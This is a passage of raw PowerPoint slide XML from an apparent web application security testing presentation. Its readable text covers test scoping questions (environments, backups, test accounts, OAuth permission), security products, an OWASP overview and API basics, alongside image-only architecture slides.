              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Production vs. Development or Staging </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any Restrictions?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Database backup?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fake data? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open Source, Purchased, or Home grown application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open Source Libraries in use </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User names &amp; Passwords – consider access levels (2 valid accounts per level)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OAuth – Permission to test 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> party</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multi -  Auth?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38781018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Consider Security products</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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security Considerations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Application Firewalls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Load Balancers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Traditional Firewalls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intrusion detection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cloud Environment – Security Controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>VPN – to access?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Agents on the Server – AV, Cylance, CrowdStrike, Carbon Black, etc..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2583384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A0-8DA3-43D4-BF65-21003BEAA9C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC9F4529-7ABA-42FB-8DA1-86C1613D8CF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="258317" y="1619865"/>
            <a:ext cx="5431284" cy="3197941"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74C1988F-6509-4328-B0B5-3CE9D80A9FA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5213555" y="3781445"/>
            <a:ext cx="6858000" cy="2913380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1759989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A0-8DA3-43D4-BF65-21003BEAA9C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF747057-CDD6-4A12-807A-FA76D0271E07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1902655" y="1839862"/>
            <a:ext cx="8077085" cy="4501945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1753374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A0-8DA3-43D4-BF65-21003BEAA9C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B90327A6-1D27-43BE-8AFD-4626C074827E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="919430" y="1600200"/>
            <a:ext cx="10353139" cy="4525963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116695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A0-8DA3-43D4-BF65-21003BEAA9C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3A8D9F4-2944-4DF5-84A6-A5C333B1C4CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1224116" y="1600201"/>
            <a:ext cx="9743768" cy="4827639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3122278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FAA0-8DA3-43D4-BF65-21003BEAA9C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37BCC0C4-1F9F-4310-AA08-F6DD0BCE83CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2610464" y="1641986"/>
            <a:ext cx="6971071" cy="5070987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2177209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C62A-FF28-4599-9F50-5341A8D90C63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1505E10E-76BF-43A1-BE4F-D3F19EC5C721}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2447123" y="1629697"/>
            <a:ext cx="6962348" cy="4731774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3884795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E9054-D5E6-478F-BC3E-0A7949830F7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50C09033-75E7-49D6-8F06-E7CD9080C322}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="644144" y="1602658"/>
            <a:ext cx="11016914" cy="4955459"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36574663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0A49D-3E92-4E96-8727-0A6D13F16837}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Front End</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C59D7A0-431A-4BF0-B526-C1F034750228}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1431825" y="1943285"/>
            <a:ext cx="3884728" cy="2304249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06AF34CD-BC5C-4253-B9E1-0E6878AB9F2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6026397" y="1985081"/>
            <a:ext cx="3808684" cy="2220656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1062705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2833635" y="-22293"/>
            <a:ext cx="9967965" cy="690165"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open Web Application Security Project (OWASP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91054B16-773C-4E24-82A7-F51BDC91E358}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>What is OWASP - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>worldwide not-for-profit charitable organization focused on improving the security of software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Mission</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is to make software security visible, so that individuals and organizations are able to make informed decisions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>OWASP TOP 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>– Biggest Contribution to the community</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Note that OWASP top 10 is not a standard </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="651215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8EE6-9BAB-4D64-877D-B1DF5D0623B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Back End Languages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="C:\Users\PC\AppData\Local\Temp\SNAGHTML593667d.PNG">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0951A102-F43E-4EB3-A27F-CA09AB6334E9}"/>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7084" y="1600200"/>
            <a:ext cx="11231716" cy="5036574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{723B977E-47A1-48A7-9C01-E1C2BCFF4CFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="828850" y="5122488"/>
            <a:ext cx="2800000" cy="1514286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F04DC943-A5CA-4438-9255-1227B1674129}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9607848" y="5132012"/>
            <a:ext cx="2380952" cy="1504762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3370540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API</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419450" y="1526795"/>
            <a:ext cx="12408250" cy="4864173"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provides a standard way for developers to communicate with external system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>REST, SOAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tokens, Keys (API Secret, Gate Way)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Swagger documents (JSON – JavaScript Object Notation) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WSDL  - XML (Web Service Definition Language)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Postman or SoapUI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BA1B470-C4CB-4CB0-B67D-AF33CCA852F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
